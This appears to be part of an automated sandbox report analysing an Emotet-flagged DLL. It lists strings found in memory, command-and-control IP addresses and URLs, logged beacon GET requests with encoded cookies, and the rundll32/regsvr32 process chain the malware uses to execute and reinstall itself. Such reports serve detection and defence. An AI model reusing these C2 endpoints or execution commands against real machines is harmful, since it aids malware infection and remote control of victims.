                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508921722.0000000002C1F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://46.55.222.11/
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://46.55.222.11/.50.40.183:80/YQXxdxwQWLyBEVjMOlgty
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://46.55.222.11/TBwKHjQjVeCWIQFS
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://46.55.222.11/TBwKHjQjVeCWIQFS)
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://46.55.222.11/TBwKHjQjVeCWIQFSN
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://46.55.222.11/TBwKHjQjVeCWIQFSi
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://46.55.222.11/TBwKHjQjVeCWIQFSz
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://51.91.7.5/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://51.91.7.5:8080/EEsdElRrfqZScZWLqBhRqLSt
                      Source: regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://51.91.76.89/
                      Source: regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://51.91.76.89:80
                      Source: regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://51.91.76.89:8080/WUUUrykRKzQgKnGAgOWXwbTPpbZjnbjXYyUgItVQHAlMtltf
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://58.227.42.236/
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://58.227.42.236/N
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://58.227.42.236/c4
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://58.227.42.236:80/
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://58.227.42.236:80/$v6/
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://58.227.42.236:80/-
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://58.227.42.236:80/:
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnP
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnPK
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://58.227.42.236:80/CBvqXjPjXUGuuflNLuZWkXecSmHukPuGWkGWJXlIStqkcdnPz
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://58.227.42.236:80/D
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://79.172.212.216/
                      Source: regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://79.172.212.2167:8080/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://79.172.212.216:8080/
                      Source: regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://79.172.212.216:8080/.
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg
                      Source: regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg$v6/
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://79.172.212.216:8080/VNwOftDFidReElfWGyCwg(
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://79.172.212.216:8080/VNwOftDFidReElfWGyCwgb
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://79.172.212.216:8080/nes
                      Source: svchost.exe, 0000000C.00000002.762160897.00000276B2E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000C.00000002.761982748.00000276B2E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000C.00000002.761982748.00000276B2E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000E.00000002.314141397.000001ECDFA4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313769610.000001ECDFA47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000E.00000003.313814458.000001ECDFA40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.314134200.000001ECDFA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000E.00000003.313814458.000001ECDFA40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.314134200.000001ECDFA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313814458.000001ECDFA40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000017.00000003.396728134.0000015C8A792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000E.00000003.313761832.000001ECDFA63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000017.00000003.392127513.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.391991165.0000015C8A795000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392087236.0000015C8A792000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392152187.0000015C8AC02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392175741.0000015C8AC03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392461273.0000015C8AC19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392344061.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392106913.0000015C8A7A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.314090796.000001ECDFA13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000E.00000003.313809959.000001ECDFA56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000E.00000003.313814458.000001ECDFA40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.314134200.000001ECDFA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000E.00000002.314141397.000001ECDFA4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313769610.000001ECDFA47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 00000017.00000003.396728134.0000015C8A792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000017.00000003.396728134.0000015C8A792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000017.00000003.392127513.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.391991165.0000015C8A795000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392087236.0000015C8A792000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392152187.0000015C8AC02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392175741.0000015C8AC03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392461273.0000015C8AC19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392344061.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392106913.0000015C8A7A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000017.00000003.392127513.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.391991165.0000015C8A795000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392087236.0000015C8A792000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392152187.0000015C8AC02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392175741.0000015C8AC03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392461273.0000015C8AC19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392344061.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392106913.0000015C8A7A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 00000017.00000003.400782206.0000015C8A792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
                      Source: svchost.exe, 00000017.00000003.400864147.0000015C8AC02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.400750031.0000015C8A7B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.400709458.0000015C8A7B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.400813065.0000015C8A7A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.400782206.0000015C8A792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknownDNS traffic detected: queries for: time.windows.com
                      Source: global trafficHTTP traffic detected: GET /SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX HTTP/1.1Cookie: wd=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI+fnIMfAI5oXYW5JqiwY3vIUlQBUwfTw48YkmxLCfsNjgx6F20LQV3Hnux9vPTgtjjTh1sYYnbNkqrHAkwHKUzWJuie4H3uJ+0/v2jViJz29FfNeDiPeJZqmSc76S+bHost: 149.56.128.192Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /TBwKHjQjVeCWIQFS HTTP/1.1Cookie: TzD=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI9Ih3e+pR2YRWgAeau9SKu/amPhx+vBX8EeVceLhJI1Cl5c/CGgAhr7yQ63yo30L73FGkUea/TvEpxNO3PjqOskzZcORWqX5SDpz1exfeePjzjvPRMWMpzyGCnmStacLsD4YfqerzQ/buYpgMei8ILwW16H6ENPPQ==Host: 46.55.222.11Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 149.56.128.192:443 -> 192.168.2.4:49762 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 46.55.222.11:443 -> 192.168.2.4:49863 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4df0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4f10000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.4590000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3530000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.9c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2940000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3530000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4dc0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.9c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4dc0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2940000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.247001370.0000000004231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.762864021.0000000004591000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.246952927.0000000002940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.246760873.0000000003530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.761637752.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250264890.0000000004DF1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250193606.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.246960941.0000000004F11000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: psIFSn7VLi.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile deleted: C:\Windows\SysWOW64\Arwhu\ttgk.pdy:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Arwhu\Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10041D70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10041D70
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10040C7C appears 42 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10040C7C appears 39 times
                      Source: psIFSn7VLi.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: psIFSn7VLi.dllVirustotal: Detection: 63%
                      Source: psIFSn7VLi.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\psIFSn7VLi.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\psIFSn7VLi.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\psIFSn7VLi.dll,DllUnregisterServer
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Arwhu\ttgk.pdy"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
